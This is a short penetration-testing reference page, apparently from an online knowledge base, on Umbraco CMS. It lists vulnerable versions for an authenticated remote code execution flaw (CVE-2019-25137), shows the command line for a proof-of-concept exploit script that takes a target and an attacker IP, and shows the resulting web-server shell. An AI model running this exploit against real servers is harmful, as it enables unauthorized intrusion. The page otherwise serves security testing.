Umbraco

Umbraco is an open-source CMS built on the `.NET platform — specifically using ASP.NET Core or ASP.NET MVC, depending on the version.

Versions

4.11.8-7.15.10, 7.12.4

Vulnerable to Authenticated RCE (CVE-2019-25137). There is working PoC available.

# Exploit the target
$ uv run exploit.py -u <username_email> -p <password> -w http://<target:port> -i <attacker_IP>
...
# List the current user
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool

PreviousSubrion NextWordPress

Last updated 8 months ago

hashtagVersions

hashtag4.11.8-7.15.10, 7.12.4

Versions

4.11.8-7.15.10, 7.12.4